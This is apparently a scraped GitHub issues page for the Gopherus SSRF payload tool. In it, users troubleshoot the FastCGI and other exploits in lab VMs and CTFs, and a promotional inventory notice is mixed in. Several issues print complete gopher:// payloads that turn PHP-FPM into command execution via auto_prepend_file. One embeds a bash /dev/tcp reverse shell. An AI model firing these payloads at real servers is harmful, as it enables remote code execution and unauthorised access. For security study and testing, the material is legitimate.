tarunkant / gopherus Goto Github PK

Hi,

I've been testing the fastcgi exploit in a local VM but unable to get it to to work.

PHP-FPM is listening on port 9000

[vagrant@localhost ~]$ netstat -tunapl | grep 9000
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:56488         127.0.0.1:9000          TIME_WAIT   -

[vagrant@localhost ~]$ sudo grep -ri listen /etc/php-fpm.d/www.conf
; - 'listen' (unixsocket)
;   'ip.add.re.ss:port'    - to listen on a TCP socket to a specific address on
;   'port'                 - to listen on a TCP socket to all addresses on a
;   '/path/to/unix/socket' - to listen on a unix socket.
listen = 127.0.0.1:9000
; Set listen(2) backlog.
;listen.backlog = 128
;listen.owner = nobody
listen.owner = apache
;listen.group = nobody
listen.group = apache
listen.mode = 0660
; PHP FCGI (5.2.2+). Makes sense only with a tcp listening socket. Each address
listen.allowed_clients = 127.0.0.1
;   listen queue         - the number of request in the queue of pending
;                          connections (see backlog in listen(2));
;   max listen queue     - the maximum number of requests in the queue
;   listen queue len     - the size of the socket queue of pending connections;
;   listen queue:         0
;   max listen queue:     1
;   listen queue len:     42

I've generated the payload an executed as follows

[vagrant@localhost Gopherus]$ pwd
/home/vagrant/Gopherus
[vagrant@localhost Gopherus]$ cat index.php
<?php

echo 'HELLO WORLD' . PHP_EOL;
[vagrant@localhost Gopherus]$ gopherus --exploit fastcgi


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /home/vagrant/Gopherus/index.php
Terminal command to run:  ls

Your gopher link is ready to do SSRF:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------
[vagrant@localhost Gopherus]$ curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
* About to connect() to 127.0.0.1 port 9000 (#0)
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)

curl just hangs until I eventually send it a SIGINT.

Any help would be much appreciated.

Hi,👋👋
I'm student in Repulic of Korea.
I'm study about cyber security.

Thanks to the tool you made recently, I solved one CTF problem well.👍👍
But there are some problems with the shell code you made(a.k.a install.sh).
If you look at the picture below, you can see an error.

The server I am currently using is Ubuntu 20.04.
If you look at the picture below, pip2 is not supported in that environment.

Operating systems and tools are updated every year.
Accordingly, it seems that the code needs to be modified.

e.g.)

A php website vunerable to SSRF using the curl_setopt() function to load files will throw this error due to the null byte in the generated url when using the payload url generated by exploit MySql and exploit FastCGI

PHP Fatal error: Uncaught ValueError: curl_setopt(): cURL option must not contain any null bytes
making the attack void

please replace
"\r\n " to "\r\n"
If need, got that https://pastebin.com/raw/Va3CH3tK

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#Gopherus

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

• Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
• Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
• Fast: Using static and client side technologies resulting in fast browsing.
• Rich tables: search, sort, browse, filter, clear
• Fancy informational popups
• Badges / Shields
• Static API
• Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

• Specialized websites: Some websites are referencing tools but additional information is not available or browsable. Make additional searches take time.
• Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
• Search engines: Search engines sometimes does find nothing, some tools or resources are too unknown or non-referenced. These is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care.

Hi,
Thank's for the tool, great job 👍

However, I have a problem with its use, when I generate a payload and run it, the cron looks like this:

It is therefore obviously not executed :/
Any ideas?

Regards,
Jomar

There's a good chance of finding phar files in standard locations according to their installation guides.

E.g.

• https://getcomposer.org/download/
• https://github.com/netz98/n98-magerun2#download-and-install-phar-file

Currently I get error below when trying to use with /usr/local/bin/composer

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

Access denied.
5 G%

File "/home/sajeesh/Gopherus/gopherus.py", line 28
print colors.green + """
^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

I use gopherus --exploit fastcgi to get RCE which execute /bin/bash -i >& /dev/tcp/IP/PORT 0>&1.

Result gopher://127.0.0.1:9001/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH102%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00f%04%00%3C%3Fphp%20system%28%27/bin/bash%20-i%20%3E%26%20/dev/tcp/IP/PORT%200%3E%261%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

I expect having a reverse shell when running curl ABOVE_GOPHER_LINK, but nothing happens instead.

Can anyone explain for me, please?